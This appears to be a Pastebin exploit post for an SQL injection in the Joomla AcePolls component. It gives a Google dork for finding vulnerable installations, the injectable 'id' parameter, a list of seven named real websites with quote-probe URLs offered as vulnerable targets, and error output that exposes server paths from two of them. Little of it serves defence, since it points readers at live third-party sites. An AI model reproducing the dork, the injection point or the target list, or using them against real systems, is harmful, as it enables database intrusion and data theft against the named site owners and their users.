Advertisement
KingSkrupellos

Joomla AcePolls 3.x SQL Injection

Feb 9th, 2019
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.79 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla AcePolls 3.x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/02/2019
  7. # Vendor Homepage : joomace.net
  8. # Software Download Link : joomace.net/downloads/acepolls
  9. github.com/S-Karpenko/ecc/tree/master/administrator/components/com_acepolls
  10. # Software Information Link : plugintop.com/joomla-extension-acepolls/
  11. joomla-secrets.ru/nastrojka-joomla/178-sozdanie-oprosa-na-joomla-acepolls
  12. # Software Version : Joomla 1.5 - 2.5 and 3.x
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : inurl:''/index.php?option=com_acepolls''
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. AcePolls is a simple and flexible component for voting.
  28.  
  29. It displays the vote results in 2 types, a nice pie chart or default Joomla way.
  30.  
  31. AcePolls offers you a lot of options that makes it very flexible.
  32.  
  33. You can add as much options as you want, choose different color for each option,
  34.  
  35. re-order options as you want, set publish and unpublish dates
  36.  
  37. for each poll, check votes per IP, cookies and user etc.
  38.  
  39. ####################################################################
  40.  
  41. # Impact :
  42. ***********
  43. Joomla AcePolls 3.x and other versions - component for Joomla is prone
  44.  
  45. to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  46.  
  47. data before using it in an SQL query.
  48.  
  49. Exploiting this issue could allow an attacker to compromise the application,
  50.  
  51. access or modify data, or exploit latent vulnerabilities in the underlying database.
  52.  
  53. A remote attacker can send a specially crafted request to the vulnerable application
  54.  
  55. and execute arbitrary SQL commands in application`s database.
  56.  
  57. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  58.  
  59. An attacker can exploit this issue using a browser.
  60.  
  61. ####################################################################
  62.  
  63. # SQL Injection Exploit :
  64. **********************
  65.  
  66. /index.php?option=com_acepolls&view=poll&id=[SQL Injection]
  67.  
  68. ####################################################################
  69.  
  70. # Example Vulnerable Sites :
  71. *************************
  72. [+] logisticatotal.co/principal/index.php?option=com_acepolls&view=poll&id=3%27
  73.  
  74. [+] turistago.com/index.php?option=com_acepolls&view=polls&Itemid=186%27
  75.  
  76. [+] lib.aanet.ru/jirbis2/index.php?option=com_acepolls&view=poll&id=11%27
  77.  
  78. [+] tecno-service.it/index.php?option=com_acepolls&view=poll&id=1%27
  79.  
  80. [+] libr.itut.ru/jirbis2/index.php?option=com_acepolls&view=poll&id=1%27
  81.  
  82. [+] sarminfo.ru/index.php?option=com_acepolls&view=poll&id=1%27
  83.  
  84. [+] usppi.it/index.php?option=com_acepolls&view=poll&id=1%27
  85.  
  86. ####################################################################
  87.  
  88. # Example SQL Database Error :
  89. ****************************
  90.  
  91. Strict Standards: Only variables should be assigned by reference
  92. /web/htdocs/www.turistago.com/home/joomla/templates
  93. /turistagodef3/functions.php on line 593
  94.  
  95. Warning: implode(): Invalid arguments passed in /web/htdocs
  96. /www.tecno-service.it/home/components/com_acepolls
  97. /views/poll/view.html.php on line 171
  98.  
  99. ####################################################################
  100.  
  101. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement